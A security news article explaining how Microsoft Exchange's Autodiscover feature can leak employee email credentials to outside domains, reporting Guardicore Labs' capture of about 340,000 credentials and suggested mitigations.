Windows Password Leak: Autodiscover Email Bug

A Widespread Email Protocol Flaw Leads to Credential Leaks

Organizations across diverse sectors – including shipping firms, energy providers, and financial institutions – are unintentionally exposing employee email passwords. This vulnerability stems from a design weakness inherent in a commonly utilized email protocol.

Understanding Autodiscover

Autodiscover, a feature within Microsoft Exchange, facilitates simplified email setup for companies managing their own email servers. It allows applications on computers or mobile devices to configure themselves using only an employee’s email address and password. This process streamlines setup by automating configuration, rather than requiring manual input.

Typically, applications search for configuration files in predetermined locations within a company’s domain. If a file isn’t found, the application attempts to locate it elsewhere within the same domain – a process known as “failing up.” A lack of success in locating the file results in inconvenience for the user.

The "Fail Up" Problem and External Exposure

However, certain applications will escalate the search one step further before giving up. This presents a significant security risk. The application then attempts communication with a domain name outside the company’s direct control, yet residing within the same top-level domain. For instance, a request from company.com might inadvertently target autodiscover.com.

Consequently, the owner of such a domain can intercept email addresses and passwords transmitted across the internet. Researchers have long cautioned about this potential for data leakage and the resulting compromise of corporate credentials.

Recent Findings by Guardicore Labs

In April, Guardicore Labs proactively acquired the autodiscover domains for several prominent top-level domains, including autodiscover.uk and autodiscover.fr. They then configured these domains to monitor incoming, potentially leaky requests.

Over a four-month period, Guardicore identified 340,000 exposed Exchange mailbox credentials being sent to these domains. Alarmingly, some organizations permit the use of these same credentials for domain login, amplifying the risk posed by malicious actors.

An additional 96,000 Exchange credentials were transmitted using secure protocols, but were susceptible to manipulation. These could be coerced into re-sending credentials in an unencrypted format.

The "Ol' Switcheroo" Attack

Amit Serper, Guardicore’s security research lead, devised an attack, aptly named “The ol’ switcheroo,” that exploits this vulnerability. The attack redirects encrypted credentials and prompts the application to utilize a less secure method, resulting in the re-transmission of the email address and password in plaintext.

The exposed credentials originated from a diverse range of companies, including real estate firms, food producers, and publicly traded entities in China.

Impact and Mitigation Strategies

For most users, this data leakage remains undetected. Guardicore is currently withholding the names of the applications most responsible for the leaks, as developers are actively implementing fixes. Serper indicated that once these fixes are deployed, the domains will be sinkholed, but remain under Guardicore’s control to prevent malicious exploitation.

Companies and individuals can proactively mitigate this risk by blocking autodiscover domains at the top-level. Application developers should also prevent their applications from escalating searches outside of a company’s designated domain.